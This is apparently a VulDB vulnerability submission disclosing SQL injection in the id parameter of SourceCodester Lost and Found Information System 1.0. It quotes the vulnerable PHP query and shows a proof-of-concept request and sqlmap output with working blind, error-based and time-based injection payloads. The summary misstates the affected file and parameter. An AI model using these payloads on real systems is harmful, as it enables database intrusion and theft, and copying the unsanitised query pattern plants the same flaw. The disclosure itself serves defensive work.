| Titel | Sql InjectionSourceCodester Lost and Found Information System 1.0 with id parameter file items/view.php |
|---|
| Beschreibung | Summary:
A vulnerability, which was classified as critical, has been found in SourceCodester Lost and Found Information System 1.0. Affected by this issue is some unknown functionality of the file items/index.php. The manipulation of the argument cid leads to sql injection.
Souce: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
Version: 1.0
Code:
<?php
if(isset($_GET['id']) && $_GET['id'] > 0){
$qry = $conn->query("SELECT *, COALESCE((SELECT `name` FROM `category_list` where `category_list`.`id` = `item_list`. `category_id` ) ,'N/A') as `category` from `item_list` where id = '{$_GET['id']}' ");
if($qry->num_rows > 0){
foreach($qry->fetch_assoc() as $k => $v){
$$k=$v;
}
}else{
echo '<script>alert("item ID is not valid."); location.replace("./?page=items")</script>';
}
}else{
echo '<script>alert("item ID is Required."); location.replace("./?page=items")</script>';
}
?>
PoC:
Request:
GET /php-lfis/?page=items/view&id=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Payload:
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 431 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=items/view&id=5' AND 6810=6810 AND 'qSXV'='qSXV
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=items/view&id=5' OR (SELECT 7311 FROM(SELECT COUNT(*),CONCAT(0x7170767071,(SELECT (ELT(7311=7311,1))),0x716a766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xYBG'='xYBG
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=items/view&id=5' AND (SELECT 1649 FROM (SELECT(SLEEP(5)))FBYs) AND 'YjkJ'='YjkJ
--- |
|---|
| Quelle | ⚠️ https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html |
|---|
| Benutzer | huutuanbg97 (UID 45015) |
|---|
| Einreichung | 11.05.2023 15:21 (vor 3 Jahren) |
|---|
| Moderieren | 12.05.2023 08:01 (17 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 228888 [SourceCodester Lost and Found Information System 1.0 GET Parameter items/view.php ID SQL Injection] |
|---|
| Punkte | 20 |
|---|